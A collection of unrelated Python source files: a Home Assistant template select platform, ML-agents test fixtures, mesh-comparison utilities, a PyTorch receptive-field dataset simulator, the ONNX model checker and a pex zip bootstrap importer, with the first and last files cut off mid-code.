    discovery_info: dict[str, Any] | None = None,
) -> None:
    """Set up the template select.

    Only discovery-driven setup (via the `template:` integration) is
    supported; direct platform configuration logs a warning and bails out.
    """
    if discovery_info is None:
        # Fixed copy/paste from the number platform: this is the select platform.
        _LOGGER.warning(
            "Template select entities can only be configured under template:"
        )
        return
    if "coordinator" in discovery_info:
        # Trigger-based entities: all share one TriggerUpdateCoordinator.
        async_add_entities(
            TriggerSelectEntity(hass, discovery_info["coordinator"], config)
            for config in discovery_info["entities"]
        )
        return
    async_add_entities(
        await _async_create_entities(
            hass, discovery_info["entities"], discovery_info["unique_id"]
        )
    )
class TemplateSelect(TemplateEntity, SelectEntity):
    """Representation of a template select."""
    def __init__(
        self,
        hass: HomeAssistant,
        name_template: Template | None,
        value_template: Template,
        availability_template: Template | None,
        command_select_option: dict[str, Any],
        options_template: Template,
        optimistic: bool,
        unique_id: str | None,
        icon_template: Template | None,
    ) -> None:
        """Initialize the select."""
        super().__init__(
            availability_template=availability_template, icon_template=icon_template
        )
        self._attr_name = DEFAULT_NAME
        # Render a static name eagerly; dynamic names are re-rendered in
        # async_added_to_hass. NOTE(review): name_template is typed Optional
        # but dereferenced unconditionally here — confirm callers never pass None.
        name_template.hass = hass
        with contextlib.suppress(TemplateError):
            self._attr_name = name_template.async_render(parse_result=False)
        self._name_template = name_template
        self._value_template = value_template
        # Script "domain" is the integration name (parent package of this module).
        domain = __name__.split(".")[-2]
        self._command_select_option = Script(
            hass, command_select_option, self._attr_name, domain
        )
        self._options_template = options_template
        # Optimistic entities report an assumed state after running the command.
        self._attr_assumed_state = self._optimistic = optimistic
        self._attr_unique_id = unique_id
        self._attr_options = None
        self._attr_current_option = None
    async def async_added_to_hass(self) -> None:
        """Register callbacks."""
        # Track the state and options templates; render errors reset to None.
        self.add_template_attribute(
            "_attr_current_option",
            self._value_template,
            validator=cv.string,
            none_on_template_error=True,
        )
        self.add_template_attribute(
            "_attr_options",
            self._options_template,
            validator=vol.All(cv.ensure_list, [cv.string]),
            none_on_template_error=True,
        )
        if self._name_template and not self._name_template.is_static:
            self.add_template_attribute("_attr_name", self._name_template, cv.string)
        await super().async_added_to_hass()
    async def async_select_option(self, option: str) -> None:
        """Change the selected option."""
        # In optimistic mode reflect the new option immediately rather than
        # waiting for the state template to re-render.
        if self._optimistic:
            self._attr_current_option = option
            self.async_write_ha_state()
        await self._command_select_option.async_run(
            {ATTR_OPTION: option}, context=self._context
        )
class TriggerSelectEntity(TriggerEntity, SelectEntity):
    """Select entity based on trigger data."""
    domain = SELECT_DOMAIN
    # CONF_STATE renders to a plain string; ATTR_OPTIONS renders to a list and
    # therefore goes through the "complex" (non-string) template path.
    extra_template_keys = (CONF_STATE,)
    extra_template_keys_complex = (ATTR_OPTIONS,)
    def __init__(
        self,
        hass: HomeAssistant,
        coordinator: TriggerUpdateCoordinator,
        config: dict,
    ) -> None:
        """Initialize the entity."""
        super().__init__(hass, coordinator, config)
        # Script "domain" is the integration name (parent package of this module).
        domain = __name__.split(".")[-2]
        self._command_select_option = Script(
            hass,
            config[CONF_SELECT_OPTION],
            self._rendered.get(CONF_NAME, DEFAULT_NAME),
            domain,
        )
    @property
    def current_option(self) -> str | None:
        """Return the currently selected option."""
        return self._rendered.get(CONF_STATE)
    @property
    def options(self) -> list[str]:
        """Return the list of available options."""
        return self._rendered.get(ATTR_OPTIONS, [])
    async def async_select_option(self, option: str) -> None:
        """Change the selected option."""
        # In optimistic mode reflect the change immediately instead of waiting
        # for the next trigger to re-render the state.
        if self._config[CONF_OPTIMISTIC]:
            self._attr_current_option = option
            self.async_write_ha_state()
        await self._command_select_option.async_run(
            {ATTR_OPTION: option}, context=self._context
        )
|
from typing import List, Tuple
from mlagents_envs.base_env import SensorSpec, DimensionProperty
import pytest
import copy
import os
from mlagents.trainers.settings import (
TrainerSettings,
PPOSettings,
SACSettings,
GAILSettings,
CuriositySettings,
RewardSignalSettings,
NetworkSettings,
TrainerType,
RewardSignalType,
ScheduleType,
)
# Demo recordings used by the imitation-learning tests live next to this module.
CONTINUOUS_DEMO_PATH = os.path.dirname(os.path.abspath(__file__)) + "/test.demo"
DISCRETE_DEMO_PATH = os.path.dirname(os.path.abspath(__file__)) + "/testdcvis.demo"
# Deliberately tiny/fast PPO settings for unit tests (small net, short run).
_PPO_CONFIG = TrainerSettings(
    trainer_type=TrainerType.PPO,
    hyperparameters=PPOSettings(
        learning_rate=5.0e-3,
        learning_rate_schedule=ScheduleType.CONSTANT,
        batch_size=16,
        buffer_size=64,
    ),
    network_settings=NetworkSettings(num_layers=1, hidden_units=32),
    summary_freq=500,
    max_steps=3000,
    threaded=False,
)
# Deliberately tiny/fast SAC settings for unit tests.
_SAC_CONFIG = TrainerSettings(
    trainer_type=TrainerType.SAC,
    hyperparameters=SACSettings(
        learning_rate=5.0e-3,
        learning_rate_schedule=ScheduleType.CONSTANT,
        batch_size=8,
        buffer_init_steps=100,
        buffer_size=5000,
        tau=0.01,
        init_entcoef=0.01,
    ),
    network_settings=NetworkSettings(num_layers=1, hidden_units=16),
    summary_freq=100,
    max_steps=1000,
    threaded=False,
)
def ppo_dummy_config():
    """Return a fresh, mutation-safe copy of the baseline PPO test settings."""
    return copy.deepcopy(_PPO_CONFIG)
def sac_dummy_config():
    """Return a fresh, mutation-safe copy of the baseline SAC test settings."""
    return copy.deepcopy(_SAC_CONFIG)
@pytest.fixture
def gail_dummy_config():
    """GAIL reward-signal settings pointing at the bundled continuous demo."""
    return {RewardSignalType.GAIL: GAILSettings(demo_path=CONTINUOUS_DEMO_PATH)}
@pytest.fixture
def curiosity_dummy_config():
    """Default curiosity reward-signal settings."""
    return {RewardSignalType.CURIOSITY: CuriositySettings()}
@pytest.fixture
def extrinsic_dummy_config():
    """Default extrinsic reward-signal settings."""
    return {RewardSignalType.EXTRINSIC: RewardSignalSettings()}
def create_sensor_specs_with_shapes(shapes: List[Tuple[int, ...]]) -> List[SensorSpec]:
    """Build one SensorSpec per shape, marking every dimension UNSPECIFIED."""
    return [
        SensorSpec(shape, (DimensionProperty.UNSPECIFIED,) * len(shape))
        for shape in shapes
    ]
|
# Read a clock time "h m s" plus a number of seconds to add, then print the
# resulting time of day on a 24-hour clock.
a, b, c = map(int, input().split())
d = int(input())
extra_min, sec = divmod(c + d, 60)
extra_hour, minute = divmod(b + extra_min, 60)
hour = (a + extra_hour) % 24
print(f'{hour} {minute} {sec}')
|
import math
import meshlabxml
import os
import tempfile
import plyfile
import numpy as np
import numba
import binvox_rw
import subprocess
def print_hausdorff(hausdorff_distance):
    """Print each metric of a Hausdorff-distance result dict, one per line."""
    for metric, value in hausdorff_distance.items():
        print('{}: {}'.format(metric, value))
@numba.njit
def minmax(array):
    """Return (min, max) of `array` in one pass, or None for empty input.

    Numba-compiled; examines two elements per iteration (one comparison to
    order the pair, then one comparison against each running extreme) instead
    of separate min() and max() scans.
    """
    # Ravel the array and return early if it's empty
    array = array.ravel()
    length = array.size
    if not length:
        return
    # We want to process two elements at once so we need
    # an even sized array, but we preprocess the first and
    # start with the second element, so we want it "odd"
    odd = length % 2
    if not odd:
        length -= 1
    # Initialize min and max with the first item
    minimum = maximum = array[0]
    i = 1
    while i < length:
        # Get the next two items and swap them if necessary
        x = array[i]
        y = array[i+1]
        if x > y:
            x, y = y, x
        # Compare the min with the smaller one and the max
        # with the bigger one
        minimum = min(x, minimum)
        maximum = max(y, maximum)
        i += 2
    # If we had an even sized array we need to compare the
    # one remaining item too.
    if not odd:
        x = array[length]
        minimum = min(x, minimum)
        maximum = max(x, maximum)
    return minimum, maximum
def hausdorff_distance_one_direction(mesh1_filepath, mesh2_filepath):
    """One-directional Hausdorff statistics (mesh1 -> mesh2) via meshlabserver."""
    filter_script = meshlabxml.create.FilterScript(
        file_in=[mesh1_filepath, mesh2_filepath], ml_version='1.3.2')
    meshlabxml.sampling.hausdorff_distance(filter_script)
    # skip_error: meshlabserver exits non-zero on some valid runs.
    filter_script.run_script(print_meshlabserver_output=False, skip_error=True)
    return filter_script.hausdorff_distance
def hausdorff_distance_bi(mesh1_filepath, mesh2_filepath):
    """Symmetric (bidirectional) Hausdorff statistics between two meshes.

    Runs meshlabserver in both directions and merges the per-direction
    results: min/max combine directly, the mean is the point-count-weighted
    average, and the RMS is recombined from the per-direction mean squares.

    Note: the former @numba.jit decorator was removed — this function is
    plain-Python dict/float work around an external meshlabserver call, so
    numba could only run it in deprecated object mode with no speedup.
    """
    hd_ab = hausdorff_distance_one_direction(mesh1_filepath, mesh2_filepath)
    hd_ba = hausdorff_distance_one_direction(mesh2_filepath, mesh1_filepath)
    min_distance_bi = min(hd_ab["min_distance"], hd_ba["min_distance"])
    max_distance_bi = max(hd_ab["max_distance"], hd_ba["max_distance"])
    sm = hd_ab["mean_distance"] * hd_ab["number_points"] + hd_ba["mean_distance"] * hd_ba["number_points"]
    mean_distance_bi = sm / (hd_ab["number_points"] + hd_ba["number_points"])
    ms = (hd_ab["rms_distance"] ** 2) * hd_ab["number_points"] + (hd_ba["rms_distance"] ** 2) * hd_ba["number_points"]
    rms_distance_bi = math.sqrt(ms / (hd_ab["number_points"] + hd_ba["number_points"]))
    return {"min_distance": min_distance_bi,
            "max_distance": max_distance_bi,
            "mean_distance": mean_distance_bi,
            "rms_distance": rms_distance_bi,
            # NOTE(review): reports only the A->B sample count — confirm intent.
            "number_points": hd_ab["number_points"]}
def calculate_voxel_side_length(mesh, grid_size):
    """Voxel edge length so the mesh's largest bounding-box extent spans grid_size voxels.

    The former @numba.jit decorator was removed: attribute access on an
    arbitrary mesh object forces numba's deprecated object-mode fallback,
    and the heavy lifting already happens inside the jitted minmax().
    """
    minx, maxx = minmax(mesh.vertices[:, 0])
    miny, maxy = minmax(mesh.vertices[:, 1])
    minz, maxz = minmax(mesh.vertices[:, 2])
    return max(abs(minx - maxx) / grid_size,
               abs(miny - maxy) / grid_size,
               abs(minz - maxz) / grid_size)
def _jaccard_distance(grid1, grid2):
    """Jaccard *similarity* |A∩B| / |A∪B| of two boolean occupancy grids.

    (Name kept for caller compatibility, but note the value returned is the
    similarity, not the distance 1 - similarity.) Two empty grids yield 0.0.

    The former @numba.jit decorator was removed: without nopython it only
    offered deprecated object-mode fallback, and these numpy reductions
    already execute in C.
    """
    intersection_count = np.count_nonzero(np.logical_and(grid1, grid2))
    union_count = np.count_nonzero(np.logical_or(grid1, grid2))
    if union_count == 0:
        return 0.0
    return float(intersection_count) / float(union_count)
def jaccard_similarity(mesh_filepath0, mesh_filepath1, grid_size=40, exact=True):
    """Voxelize both meshes with binvox (over mesh0's bounding box, so the
    grids align) and return their Jaccard similarity.

    Fixes: .binvox files are a binary format, so they must be opened in 'rb'
    (text mode breaks decoding on Python 3); temp files are now cleaned up
    in a finally block even when binvox or parsing fails.
    """
    # binvox names its output after the input file, so give each mesh a
    # unique symlinked name to avoid clobbering existing .binvox files.
    temp_mesh0_filepath = tempfile.mktemp(suffix=".ply")
    temp_mesh1_filepath = tempfile.mktemp(suffix=".ply")
    binvox0_filepath = temp_mesh0_filepath.replace(".ply", ".binvox")
    binvox1_filepath = temp_mesh1_filepath.replace(".ply", ".binvox")
    try:
        os.symlink(os.path.abspath(mesh_filepath0), temp_mesh0_filepath)
        os.symlink(os.path.abspath(mesh_filepath1), temp_mesh1_filepath)
        mesh0 = plyfile.PlyData.read(temp_mesh0_filepath)
        minx, maxx = minmax(mesh0['vertex']['x'])
        miny, maxy = minmax(mesh0['vertex']['y'])
        minz, maxz = minmax(mesh0['vertex']['z'])
        # -d: specify voxel grid size (default 256, max 1024)(no max when using -e)
        # -e: exact voxelization (any voxel with part of a triangle gets set)(does not use graphics card)
        # -bb <minx> <miny> <minz> <maxx> <maxy> <maxz>: force a different input model bounding box
        cmd_base = "binvox -pb "
        if exact:
            cmd_base += "-e "
        cmd_base += "-d " + str(grid_size) + " -bb " + str(minx) + " " + str(miny) + " " + str(minz) + " " + str(maxx) + " " + str(maxy) + " " + str(maxz)
        mesh0_cmd = cmd_base + " " + temp_mesh0_filepath
        mesh1_cmd = cmd_base + " " + temp_mesh1_filepath
        process = subprocess.Popen(mesh0_cmd.split(" "), stdout=subprocess.PIPE)
        process.communicate()
        process = subprocess.Popen(mesh1_cmd.split(" "), stdout=subprocess.PIPE)
        process.communicate()
        # binvox output is binary: open in 'rb' (was 'r', which fails on py3).
        with open(binvox0_filepath, 'rb') as mesh0_binvox_file:
            mesh0_binvox = binvox_rw.read_as_3d_array(mesh0_binvox_file)
        with open(binvox1_filepath, 'rb') as mesh1_binvox_file:
            mesh1_binvox = binvox_rw.read_as_3d_array(mesh1_binvox_file)
        return _jaccard_distance(mesh0_binvox.data, mesh1_binvox.data)
    finally:
        for path in (temp_mesh0_filepath, temp_mesh1_filepath,
                     binvox0_filepath, binvox1_filepath):
            if os.path.exists(path):
                os.remove(path)
|
from datetime import datetime, date, time, timedelta
from .model import TestingMixin
from .util import testing_config, truncate, Matcher, near, let, one_of
# Public API of the testing helpers.
# NOTE(review): Matcher (and the datetime names) are imported above but not
# listed here — confirm whether they are meant to be part of the public API.
__all__ = [
    "TestingMixin",
    "testing_config",
    "truncate",
    "near",
    "let",
    "one_of",
]
|
import math
from typing import Callable, Union, Dict, Tuple, Optional
import torch
import torch.utils.data
# import Dataset, DataLoader
class InpData(torch.utils.data.Dataset):
    """Minimal in-memory dataset pairing inputs X with targets Y.

    Tensors are stored as-is; converting from numpy is the caller's job.
    """

    def __init__(self, X, Y):
        self.X = X
        self.Y = Y

    def __len__(self):
        # One sample per row of X.
        return self.X.shape[0]

    def __getitem__(self, idx):
        return self.X[idx], self.Y[idx]
def random_classification(s, d, batch_size):
    """Random binary-classification loaders (train and val share the data).

    s: number of samples, d: feature dimension.
    """
    features = torch.randn(s, d)
    labels = torch.randint(2, (s,))
    splits = {'train': InpData(features, labels),
              'val': InpData(features, labels)}
    return {
        split: torch.utils.data.DataLoader(
            splits[split], batch_size=batch_size, shuffle=True, num_workers=1,
            drop_last=True)
        for split in ['train', 'val']
    }
def data(num_trials: int, n_time: int, num_receptive_fields: Union[int, Tuple[Tuple[int]]], tau: int = 1000,
         latents: Tuple[Tuple[str]] = (('x',), ('y',), ('theta',)), num_peaks: Optional[Tuple[int]] = None,
         peak_width_factors: Optional[Union[Tuple[Tuple[float]], float]] = 0.1, sigma_mult: float = 0.,
         sigma_add: float = 0.):
    """Simulate Gaussian receptive-field population responses to latent trajectories.

    Each latent performs a random walk (or i.i.d. resampling when tau == 0) on
    [0, 1); 'theta' is treated as circular, 'x'/'y' as linear (reflected).
    To have a smooth motion the timescale and the variance of the field need
    to match. Roughly this means that tau^2~Inp_dim.

    Fixes vs. previous version: a stray bare `print` expression (a no-op) was
    removed, and 'y' latents are now accepted (the documented default
    `latents` includes ('y',), which previously always raised AttributeError).

    Parameters
    ----------
    num_trials : int
    n_time : int
        Time steps per trial.
    num_receptive_fields : Union[int, Tuple[Tuple[int]]]
        Fields per latent dimension; a scalar is broadcast to every latent.
    tau : int
        Random-walk timescale; 0 means resample uniformly each step.
    latents : Tuple[Tuple[str]]
        Groups of latent names; each group shares a joint receptive-field grid.
    num_peaks : Optional[Tuple[int]]
        Currently unused — kept for interface compatibility.
    peak_width_factors : Optional[Union[Tuple[Tuple[float]], float]]
        Gaussian width(s) of the receptive fields.
    sigma_mult : float
        Currently unused — kept for interface compatibility.
    sigma_add : float
        Std of additive Gaussian noise on the responses.

    Returns
    -------
    (responses, responses, latent_vals): the response tensor of shape
    (num_trials, n_time, total_fields) twice (inputs == targets), plus the
    per-group latent trajectories.
    """
    # Broadcast a scalar field count to every latent dimension.
    if not hasattr(num_receptive_fields, '__len__'):
        d = num_receptive_fields
        num_receptive_fields = []
        for i0 in range(len(latents)):
            num_receptive_fields.append([])
            for i1 in range(len(latents[i0])):
                num_receptive_fields[i0].append(d)

    def circular_distances(i, j, circular=False):
        # Pairwise distances between field centers (i) and latent values (j);
        # wrapped around the unit interval when the latent is circular.
        cdist = torch.cdist
        j = j.reshape(-1, 1)
        i = i.reshape(-1, 1)
        dists = cdist(j, i)
        if circular:
            dists = torch.min(torch.remainder(dists, 1), torch.remainder(1 - dists, 1))
        return dists

    responses = []
    latent_vals = []
    for i0, latent_group in enumerate(latents):
        latent_vals_group = []
        len_latents = len(latent_group)
        # Total fields in this group = product over its latent dimensions.
        p = 1
        for x in num_receptive_fields[i0]:
            p = p * x
        dists = torch.zeros(num_trials * n_time, p, len_latents)
        # Evenly spaced field centers on [0, 1) along each latent dimension,
        # combined into a joint grid.
        temp = [torch.linspace(0, 1 - 1 / num_receptive_fields[i0][i1], num_receptive_fields[i0][i1]) for i1 in
                range(len_latents)]
        out = torch.meshgrid(temp)
        receptive_field_centers = torch.stack(out, dim=-1).reshape(-1, len_latents)
        for i1, x in enumerate(latent_group):
            if x == 'theta':
                circular = True
                tau_eff = tau
            elif x in ('x', 'y'):
                circular = False
                tau_eff = tau
            else:
                raise AttributeError("Latent variable not recognized.")
            if hasattr(peak_width_factors, '__len__'):
                sigma = peak_width_factors[i0][i1]
            else:
                sigma = peak_width_factors
            # Latent trajectory: random walk with step std 1/sqrt(tau_eff),
            # or i.i.d. uniform resampling when tau == 0.
            latent_val = torch.zeros((num_trials, n_time))
            latent_val[:, 0] = torch.rand(num_trials)
            for i_time in range(1, n_time):
                if tau == 0:
                    latent_val[:, i_time] = torch.rand(num_trials)
                else:
                    temp = (1 / math.sqrt(tau_eff)) * torch.randn(num_trials)
                    latent_val[:, i_time] = latent_val[:, i_time - 1] + temp
            # Map the unconstrained walk into [0, 1): reflect linear latents,
            # wrap circular ones.
            if not circular:
                latent_val = torch.abs(torch.remainder(2 * latent_val, 2) - 1)
            else:
                latent_val = torch.remainder(latent_val, 1)
            latent_vals_group.append(latent_val)
            dist_x = circular_distances(receptive_field_centers[:, i1].unsqueeze(dim=-1), latent_val, circular)
            dists[:, :, i1] = dist_x
        latent_vals.append(latent_vals_group)
        dist_sq_final = torch.sum(dists ** 2, dim=-1).reshape((num_trials, n_time, p))
        # NOTE(review): `sigma` here is the width of the group's *last* latent
        # dimension — confirm mixed per-dimension widths are intended to work.
        responses.append(torch.exp(-dist_sq_final / sigma ** 2))
    responses = torch.cat(responses, dim=-1)
    if sigma_add != 0:
        responses = responses + sigma_add * torch.randn(*responses.shape)
    responses = 0.1 * responses
    return responses, responses, latent_vals
def dataset(num_trials: int, n_time: int, Inp_dim: int, tau: int = 1000,
            latents: Tuple[Tuple[str]] = (('x',), ('y',), ('theta',)), num_peaks: Optional[Tuple[int]] = None,
            peak_width_factors: Optional[Union[Tuple[Tuple[float]], float]] = 0.1, sigma_mult: float = 0.,
            sigma_add: float = 0., freeze_epochs: bool = True, train_perc: float = 0.8, return_latents: bool = False):
    """Build train/val InpData datasets from simulated receptive-field responses.

    The first `train_perc` fraction of each trial's timeline becomes the train
    split and the remainder the validation split; the trial and time axes are
    then flattened into a single sample axis.
    """
    if not freeze_epochs:
        raise AttributeError("freeze_epochs=False option isn't implemented yet")
    inputs, targets, latent_vals = data(num_trials, n_time, Inp_dim, tau, latents, num_peaks, peak_width_factors,
                                        sigma_mult, sigma_add)
    train_time = int(round(train_perc * n_time))

    def _flat(tensor):
        # (trials, time, features) -> (trials * time, features)
        return tensor.reshape(-1, tensor.shape[-1])

    train_dataset = InpData(_flat(inputs[:, :train_time]), _flat(targets[:, :train_time]))
    val_dataset = InpData(_flat(inputs[:, train_time:]), _flat(targets[:, train_time:]))
    if not return_latents:
        return train_dataset, val_dataset
    # Split and flatten the latent trajectories the same way as the responses.
    train_latent_vals = [[x[:, :train_time].reshape(-1) for x in group] for group in latent_vals]
    val_latent_vals = [[x[:, train_time:].reshape(-1) for x in group] for group in latent_vals]
    return train_dataset, val_dataset, train_latent_vals, val_latent_vals
if __name__ == '__main__':
    # Smoke test: small dataset mixing a circular+linear group with a linear one.
    # (A stray bare `print` expression — a no-op in Python 3 — was removed.)
    out = dataset(4, 120, 20, tau=0, latents=(('theta', 'x'), ('x',)), sigma_mult=0, sigma_add=0.00)
|
# SPDX-License-Identifier: Apache-2.0
"""onnx checker
This implements graphalities that allows us to check whether a serialized
proto is legal.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import functools
from onnx import (ValueInfoProto,
AttributeProto,
TensorProto,
SparseTensorProto,
NodeProto,
ModelProto,
GraphProto,
IR_VERSION)
import onnx.onnx_cpp2py_export.checker as C
import onnx.defs
from google.protobuf.message import Message
from typing import TypeVar, Callable, Any, Type, cast, Union, Text
import onnx.shape_inference
import sys
# Limitation of single protobuf file is 2GB
MAXIMUM_PROTOBUF = 2000000000
# TODO: This thing where we reserialize the protobuf back into the
# string, only to deserialize it at the call site, is really goofy.
# Stop doing that.
# NB: Please don't edit this context!
# Shared checker context: the IR version to validate against plus the
# default opset version table used by all module-level check_* helpers.
DEFAULT_CONTEXT = C.CheckerContext()
DEFAULT_CONTEXT.ir_version = IR_VERSION
# TODO: Maybe ONNX-ML should also be defaulted?
DEFAULT_CONTEXT.opset_imports = {'': onnx.defs.onnx_opset_version()}
FuncType = TypeVar('FuncType', bound=Callable[..., Any])
# TODO: This really doesn't seem worth the metaprogramming...
def _create_checker(proto_type):  # type: (Type[Message]) -> Callable[[FuncType], FuncType]
    """Decorator factory: route a Python stub checker to its C++ namesake.

    The wrapper type-guards the proto, serializes it, and dispatches to the
    C extension function with the same name as the decorated stub.
    """
    def decorator(py_func):  # type: (FuncType) -> FuncType
        @functools.wraps(py_func)
        def checker(proto, ctx=DEFAULT_CONTEXT):  # type: (Message, C.CheckerContext) -> Any
            if not isinstance(proto, proto_type):
                raise RuntimeError(
                    'You cannot pass an object that is not of type {}'.format(
                        proto_type.__name__))
            c_checker = getattr(C, py_func.__name__)
            return c_checker(proto.SerializeToString(), ctx)
        return cast(FuncType, checker)
    return decorator
# Each check_* below is a thin typed stub: _create_checker replaces the body
# with a call into the C++ checker of the same name, so the Python bodies
# are intentionally just `pass`.
@_create_checker(ValueInfoProto)
def check_value_info(value_info, ctx=DEFAULT_CONTEXT):  # type: (ValueInfoProto, C.CheckerContext) -> None
    pass
@_create_checker(TensorProto)
def check_tensor(tensor, ctx=DEFAULT_CONTEXT):  # type: (TensorProto, C.CheckerContext) -> None
    pass
@_create_checker(AttributeProto)
def check_attribute(attr, ctx=DEFAULT_CONTEXT):  # type: (AttributeProto, C.CheckerContext) -> None
    pass
@_create_checker(NodeProto)
def check_node(node, ctx=DEFAULT_CONTEXT):  # type: (NodeProto, C.CheckerContext) -> None
    pass
@_create_checker(GraphProto)
def check_graph(graph, ctx=DEFAULT_CONTEXT):  # type: (GraphProto, C.CheckerContext) -> None
    pass
def check_sparse_tensor(sparse, ctx=DEFAULT_CONTEXT):  # type: (SparseTensorProto, C.CheckerContext) -> None
    # Sparse tensors have no decorator-based wrapper; call the C++ checker directly.
    C.check_sparse_tensor(sparse.SerializeToString(), ctx)
def check_model(model, full_check=False):  # type: (Union[ModelProto, Text, bytes], bool) -> None
    """Check an ONNX model given as a ModelProto, serialized bytes, or a file path.

    With full_check=True, shape inference also runs in strict mode.
    """
    # If model is a path instead of ModelProto, let the C++ checker stream
    # the file — this is the only way to handle models larger than 2GB.
    if isinstance(model, str):
        C.check_model_path(model)
        if full_check:
            onnx.shape_inference.infer_shapes_path(model, check_type=True, strict_mode=True)
        return
    protobuf_string = model.SerializeToString() if not isinstance(model, bytes) else model
    # A single protobuf message is capped at 2GB; direct users to the path API.
    if sys.getsizeof(protobuf_string) > MAXIMUM_PROTOBUF:
        raise ValueError('This protobuf of onnx model is too large (>2GB). Call check_model with model path instead.')
    C.check_model(protobuf_string)
    if full_check:
        onnx.shape_inference.infer_shapes(model, check_type=True, strict_mode=True)
ValidationError = C.ValidationError
|
"""Zipfile entry point which supports auto-extracting itself based on zip-safety."""
from importlib import import_module
from zipfile import ZipFile, ZipInfo, is_zipfile
import os
import runpy
import sys
PY_VERSION = sys.version_info
if PY_VERSION.major >= 3:
from importlib import machinery
else:
import imp
if PY_VERSION >= (3, 2):
from os import makedirs
else:
# backported from cpython 3.8
def makedirs(name, mode=0o777, exist_ok=False):
"""makedirs(name [, mode=0o777][, exist_ok=False])
Super-mkdir; create a leaf directory and all intermediate ones. Works like
mkdir, except that any intermediate path segment (not just the rightmost)
will be created if it does not exist. If the target directory already
exists, raise an OSError if exist_ok is False. Otherwise no exception is
raised. This is recursive.
"""
head, tail = os.path.split(name)
if not tail:
head, tail = os.path.split(head)
if head and tail and not os.path.exists(head):
try:
makedirs(head, exist_ok=exist_ok)
except FileExistsError:
# Defeats race condition when another thread created the path
pass
cdir = curdir
if isinstance(tail, bytes):
cdir = bytes(curdir, "ASCII")
if tail == cdir: # xxx/newdir/. exists if xxx/newdir exists
return
try:
os.mkdir(name, mode)
except OSError:
# Cannot rely on checking for EEXIST, since the operating system
# could give priority to other errors like EACCES or EROFS
if not exist_ok or not os.path.isdir(name):
raise
try:
from site import getsitepackages
except:
def getsitepackages(prefixes=[sys.prefix, sys.exec_prefix]):
"""Returns a list containing all global site-packages directories.
For each directory present in ``prefixes`` (or the global ``PREFIXES``),
this function will find its `site-packages` subdirectory depending on the
system environment, and will return a list of full paths.
"""
sitepackages = []
seen = set()
if prefixes is None:
prefixes = PREFIXES
for prefix in prefixes:
if not prefix or prefix in seen:
continue
seen.add(prefix)
if os.sep == '/':
sitepackages.append(os.path.join(prefix, "lib",
"python%d.%d" % sys.version_info[:2],
"site-packages"))
else:
sitepackages.append(prefix)
sitepackages.append(os.path.join(prefix, "lib", "site-packages"))
return sitepackages
# Put this pex on the path before anything else.
PEX = os.path.abspath(sys.argv[0])
# This might get overridden down the line if the pex isn't zip-safe.
PEX_PATH = PEX
sys.path = [PEX_PATH] + sys.path
# These will get templated in by the build rules.
MODULE_DIR = '__MODULE_DIR__'
ENTRY_POINT = '__ENTRY_POINT__'
ZIP_SAFE = __ZIP_SAFE__
PEX_STAMP = '__PEX_STAMP__'
# Workaround for https://bugs.python.org/issue15795
class ZipFileWithPermissions(ZipFile):
    """ZipFile that restores POSIX permission bits when extracting members."""

    def _extract_member(self, member, targetpath, pwd):
        info = member if isinstance(member, ZipInfo) else self.getinfo(member)
        extracted = super(ZipFileWithPermissions, self)._extract_member(
            info, targetpath, pwd
        )
        # The upper 16 bits of external_attr hold the Unix mode; apply it
        # when present (zero means the archive recorded no permissions).
        mode = info.external_attr >> 16
        if mode:
            os.chmod(extracted, mode)
        return extracted
class SoImport(object):
    """So import. Much binary. Such dynamic. Wow.

    Meta-path importer that loads C extension modules (.so/.pyd) out of the
    pex zip by spilling them to a temporary file first, since extensions
    cannot be dlopen'ed from inside a zipfile.
    """
    def __init__(self):
        # Known C-extension suffixes for this interpreter.
        if PY_VERSION.major < 3:
            self.suffixes = {x[0]: x for x in imp.get_suffixes() if x[2] == imp.C_EXTENSION}
        else:
            self.suffixes = machinery.EXTENSION_SUFFIXES  # list, as importlib will not be using the file description
        # Longest suffix first so e.g. ".cpython-39-x86_64.so" wins over ".so".
        self.suffixes_by_length = sorted(self.suffixes, key=lambda x: -len(x))
        # Identify all the possible modules we could handle.
        self.modules = {}
        if is_zipfile(sys.argv[0]):
            zf = ZipFileWithPermissions(sys.argv[0])
            for name in zf.namelist():
                path, _ = self.splitext(name)
                if path:
                    if path.startswith('.bootstrap/'):
                        path = path[len('.bootstrap/'):]
                    importpath = path.replace('/', '.')
                    self.modules.setdefault(importpath, name)
                    # Also register the module under its MODULE_DIR-relative name.
                    if path.startswith(MODULE_DIR):
                        self.modules.setdefault(importpath[len(MODULE_DIR)+1:], name)
            if self.modules:
                self.zf = zf
    def find_module(self, fullname, path=None):
        """Attempt to locate module. Returns self if found, None if not."""
        if fullname in self.modules:
            return self
    def load_module(self, fullname):
        """Actually load a module that we said we'd handle in find_module."""
        import tempfile
        filename = self.modules[fullname]
        prefix, ext = self.splitext(filename)
        # Extensions can't be imported from inside a zip: copy the bytes out
        # to a temp file with the right suffix and load from there.
        with tempfile.NamedTemporaryFile(suffix=ext, prefix=os.path.basename(prefix)) as f:
            f.write(self.zf.read(filename))
            f.flush()
            if PY_VERSION.major < 3:
                suffix = self.suffixes[ext]
                mod = imp.load_module(fullname, None, f.name, suffix)
            else:
                mod = machinery.ExtensionFileLoader(fullname, f.name).load_module()
        # Make it look like module came from the original location for nicer tracebacks.
        mod.__file__ = filename
        return mod
    def splitext(self, path):
        """Similar to os.path.splitext, but splits our longest known suffix preferentially."""
        for suffix in self.suffixes_by_length:
            if path.endswith(suffix):
                return path[:-len(suffix)], suffix
        return None, None
class ModuleDirImport(object):
    """Handles imports to a directory equivalently to them being at the top level.

    This means that if one writes `import third_party.python.six`, it's imported
    like `import six`, but becomes accessible under both names. This handles both
    the fully-qualified import names and packages importing as their expected
    top-level names internally.
    """

    def __init__(self, module_dir=MODULE_DIR):
        self.prefix = module_dir.replace('/', '.') + '.'

    def find_module(self, fullname, path=None):
        """Attempt to locate module. Returns self if found, None if not."""
        if fullname.startswith(self.prefix):
            return self

    def load_module(self, fullname):
        """Actually load a module that we said we'd handle in find_module."""
        module = import_module(fullname[len(self.prefix):])
        sys.modules[fullname] = module
        return module

    def find_distributions(self, context):
        """Return an iterable of all Distribution instances capable of
        loading the metadata for packages for the indicated ``context``.
        """
        try:
            from importlib_metadata import Distribution
            import re
        except:
            pass
        else:
            class PexDistribution(Distribution):
                # Regex template matching a package's .dist-info/.egg-info
                # entries inside the pex. `filename` is interpolated per
                # query; the previous literal `(unknown)` in place of the
                # {filename} placeholder made every metadata lookup fail.
                template = r"{path}(-.*)?\.(dist|egg)-info/{filename}"

                def __init__(self, name, prefix=MODULE_DIR):
